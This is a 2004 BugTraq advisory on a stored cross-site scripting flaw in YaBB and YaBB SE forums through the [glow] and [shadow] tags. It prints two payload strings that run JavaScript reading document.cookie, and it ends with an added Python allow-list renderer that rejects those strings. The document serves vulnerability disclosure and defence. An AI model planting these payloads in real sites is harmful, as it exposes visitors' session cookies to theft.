BugTraq
YaBB/YaBBse Cross Site Scripting Vulnerability Mar 14 2004 07:52AM
Cheng Peng Su (apple_soup msn com)


#####################################################################
Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability
Release Date  : Mar 14, 2004
Application   : YaBB/YaBBse
Tested On     : YaBB 1 Gold (SP1.3)
                YaBB SE 1.5.1 Final
Vendor URL    : http://www.yabbforum.com/
                http://www.yabbse.org/
Discovered By : Cheng Peng Su (apple_soup_at_msn.com)
#####################################################################

Proof of concept:

The problem is in the [glow] and [shadow] tags: YaBB doesn't filter
the characters inside these tags. The attack does not need the visitor
to click any links; as soon as the visitor reads the thread, the XSS
code is executed.

Exploit:

[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

Contact:

Cheng Peng Su
Class 1, Senior 2, High school attached to Wuhan University
Wuhan, Hubei, China (430072)
apple_soup_at_msn.com
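
Added example, not part of the original advisory and not YaBB's own code: one way a BBCode renderer can close this class of bug is to accept only allow-listed values for each [glow]/[shadow] argument and leave anything else as inert, HTML-escaped text. The argument order, the direction keywords and the generated style string are assumptions made for illustration.

```python
import html
import re

# Allow-lists for each tag argument. Assumed argument order (inferred from the
# strings in the advisory): glow=colour,strength,width / shadow=colour,direction,width
COLOR = r"(?:[a-zA-Z]{1,20}|#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6})"
NUM = r"\d{1,4}"
DIRECTION = r"(?:left|right|up|down)"  # assumed keyword set

ARGS = {
    "glow": re.compile(rf"({COLOR}),({NUM}),({NUM})"),
    "shadow": re.compile(rf"({COLOR}),({DIRECTION}),({NUM})"),
}
TAG_RE = re.compile(r"\[(glow|shadow)=([^\]]*)\](.*?)\[/\1\]", re.S | re.I)


def render(post: str) -> str:
    """Render [glow]/[shadow] tags; tags with non-conforming arguments stay text."""
    # Escape first, so the tag body can never carry raw markup or quotes.
    escaped = html.escape(post, quote=True)

    def repl(m: re.Match) -> str:
        name, args, body = m.group(1).lower(), m.group(2), m.group(3)
        ok = ARGS[name].fullmatch(args)  # whole argument must match, not a prefix
        if not ok:
            return m.group(0)  # rejected: emitted unchanged as plain text
        color, second, width = ok.groups()
        key = "strength" if name == "glow" else "direction"
        # Illustrative style template (assumption); only validated tokens reach it.
        style = f"filter:{name}(color={color},{key}={second});width:{width}px"
        return f'<span style="{style}">{body}</span>'

    return TAG_RE.sub(repl, escaped)


if __name__ == "__main__":
    benign = "[glow=red,2,300]Hello[/glow]"
    # The string published in the advisory above, used here as a rejection test.
    advisory = ("[glow=red);background:url(javascript:alert(document.cookie));"
                "filter:glow(color=red,2,300]Big Exploit[/glow]")
    print(render(benign))    # rendered as a styled span
    print(render(advisory))  # left as plain text, no style attribute produced
```

The key detail is `fullmatch`: the advisory's strings begin with a valid colour name, so a prefix match or a deny-list of a few characters would still let the trailing declarations through.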
